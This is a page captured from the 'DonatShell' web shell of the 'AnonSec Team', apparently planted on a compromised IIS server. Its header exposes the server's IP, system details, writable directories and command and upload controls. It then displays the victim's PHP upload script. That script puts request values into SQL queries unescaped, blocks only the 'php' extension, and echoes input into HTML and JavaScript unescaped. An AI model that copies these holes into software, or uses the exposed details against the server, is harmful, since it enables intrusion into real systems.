DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.194
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/AppServ/www/umedia3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/AppServ/www/umedia3/globalupload.php
<?
     include("./inc/config.inc.php");
	 html_start();


function local_getfilesize($wh) {
	//echo $wh2;
	if (file_exists($wh)) {
		return number_format(filesize($wh)/1024)."kb";
	} else {
		return " äÁ辺ä¿Åì ";
	}
}

?>
<SCRIPT LANGUAGE="JavaScript">
<!--
function insertpic(wh) {
	str="<img src='"+wh+"' align=absmiddle vspace=1 hspace=1 width=200 >";
	//alert(str);
	var oEditor = parent.FCKeditorAPI.GetInstance('<? echo $addtotextarea?>') ;
	if ( oEditor.EditMode == parent.FCK_EDITMODE_WYSIWYG ) {
		oEditor.InsertHtml( str ) ;
	} else {
		alert( 'You must be on WYSIWYG mode!' ) ;
	}
	

	//parent.Toggle('InsertImage',wh);
	//parent.editor_insertHTML("text",str);
//	parent.document.all['text'].insertAdjacentHTML("beforeEnd", str);
	//top.document.all.text.value=top.document.all.text.value+"\n"+wh
	//	alert(wh);
	//alert(top.document.all.text.value);
}

function insertlink(wh) {
	str=" <a href='"+wh+"' target=_blank>[<? echo getlang("¤ÅÔ¡::l::Click")?>]</a> ";
	//alert(str);
	var oEditor = parent.FCKeditorAPI.GetInstance('<? echo $addtotextarea?>') ;
	if ( oEditor.EditMode == parent.FCK_EDITMODE_WYSIWYG ) {
		oEditor.InsertHtml( str ) ;
	} else {
		alert( 'You must be on WYSIWYG mode!' ) ;
	}
	
}
//-->
</SCRIPT>
<?

 $ismanager=loginchk_lib("check");

 $addtotextarea=trim($addtotextarea);
 $key=trim($key);

if ($key=="") {
	die("globalupload.php need key ($key)");
}
$_VAL_FILE_SAVEPATHurl="$dcrURL/_globalupload/$key/";
$_VAL_FILE_SAVEPATH="$dcrs/_globalupload/$key/";
	if ( $ismanager!=true) {
		die("you cannot use global upload");
	}

/////////////////////////////////////////////

	$uploaddir =$_VAL_FILE_SAVEPATH;
	@mkdir("$uploaddir", 0777);
	$dir=$uploaddir;

	$filename=randid();
	$ext=explode('.',$_FILES[file1][name]);
	$filename.=".".$ext[count($ext)-1];
$pureext=strtolower($ext[count($ext)-1]);
	if ($pureext=="php") {
		die("ext-php");
	}
	$uploadfile="$dir$filename";
		$sourcefile=$_FILES['file1']['tmp_name'];
		$uploadedfilename=$_FILES[file1][name];
		$ctt=$_FILES[file1][type];
if (is_uploaded_file($_FILES['file1']['tmp_name'])) {
	if (copy($sourcefile, $uploadfile)) {
		$now=time();
		$s= "insert into globalupload set
		loginid='$useradminid' ,
		keyid='$key' ,
		filename='$uploadedfilename' ,
		ctt='$ctt' ,
		dt='$now' ,
		hidename='$filename'
			";
		tmq($s,false);

		//echo "ÍѾâËÅ´àÃÕºÃéÍÂ";
	} else {
		echo "copy($sourcefile, $uploadfile)";
		echo "äÁèÊÒÁÒöà¤Å×è͹ÂéÒÂä¿Åìä»Âѧ·Õè¨Ñ´à¡çºä´é\n";
		die;
	}
	unlink($sourcefile);

} else {
   //echo getlang("¡ÒÃÍѾâËÅ´äÁèÊÓàÃç¨::l::Upload failed");
}
/////////////////////////////////////////////

if ($remove!="") {
	$remq=tmq("select * from globalupload where keyid='$key' and id='$remove'");
	$remq=tmq_fetch_array($remq);
	//rename($_VAL_FILE_SAVEPATH.$remq[hidename],$_VAL_FILE_SAVEPATHunused.$remq[hidename]);
	@unlink($_VAL_FILE_SAVEPATH.$remq[hidename]);
	@unlink($_VAL_FILE_SAVEPATH.$remq[hidename].".thumb.jpg");
	tmq("delete from  globalupload where keyid='$key' and id='$remove' ");
}

?><TABLE class=table_border width=100%>
<TR>
	<TD class=table_head width=70%><? echo getlang("ª×èÍä¿Åì::l::File name");?> </TD>
	<TD class=table_head><? echo getlang("¢¹Ò´::l::Size");?></TD>
	<TD class=table_head><? echo getlang("źä¿Åì::l::Delete");?></TD>
</TR>
<?
$s=tmq("select * from  globalupload where keyid='$key' ");
html_rows0_str($s,getlang("äÁèÁÕä¿ÅìṺ::l::No uploaded file"),3);
while ($r=tmq_fetch_array($s)) {
?><TR>
	<TD class=table_td><?
		$ext=strtolower(substr($r[hidename],-3));
if ($ext=="jpg" || $ext=="gif" || $ext=="png" || $ext=="bmp" ) {
	?><img src="<?echo "$_VAL_FILE_SAVEPATHurl/$r[hidename]"; ?>" width=25 align=absmiddle border=1  <?
	if ( $addtotextarea!="") {	
		?>onclick="insertpic('<? echo "$_VAL_FILE_SAVEPATHurl/$r[hidename]"; ?>');"><?
	}
} else {
	if ( $addtotextarea!="") {	
		?><img src="<?echo "$dcrURL/neoimg/misc/ICCONFIG.GIF"; ?>" width=16 align=absmiddle border=0  onclick="insertlink('<? echo "$_VAL_FILE_SAVEPATHurl/$r[hidename]"; ?>');" style='cursor:hand;'><?
	}
}
?> <A HREF="<?echo $_VAL_FILE_SAVEPATHurl?>/<? echo $r[hidename]; ?>" target=_blank><? echo $r[filename];;?></A> </TD>
	<TD class=table_td align=center><?
echo local_getfilesize($_VAL_FILE_SAVEPATH.$r[hidename]);	
?></TD>
	<TD class=table_td align=center><A HREF="globalupload.php?remove=<? echo $r[id];?>&key=<? echo $key;?>&addtotextarea=<? echo $addtotextarea;?>" onclick="return confirm('¡ÃسÒÂ×¹Âѹ¡ÒÃź');"><? echo getlang("źä¿Åì::l::Delete");?></A></TD>
</TR>
<?
}
?>
</TABLE><TABLE class=table_border width=100%>
<FORM METHOD=POST ACTION="globalupload.php" enctype="multipart/form-data">
<TR>
	<TD class=table_head width=20%>ÍѾâËÅ´</TD>
	<TD class=table_td><INPUT TYPE="file" NAME="file1" size=5> <INPUT TYPE="submit" value='ÍѾâËÅ´'></TD>
</TR>
<INPUT TYPE="hidden" NAME="key" value="<? echo $key;?>">
<INPUT TYPE="hidden" NAME="addtotextarea" value="<? echo $addtotextarea;?>">
</FORM>
</TABLE>
 <FONT color=888888 class=smaller2><?echo $key;?></FONT>

Anon7 - 2022
AnonSec Team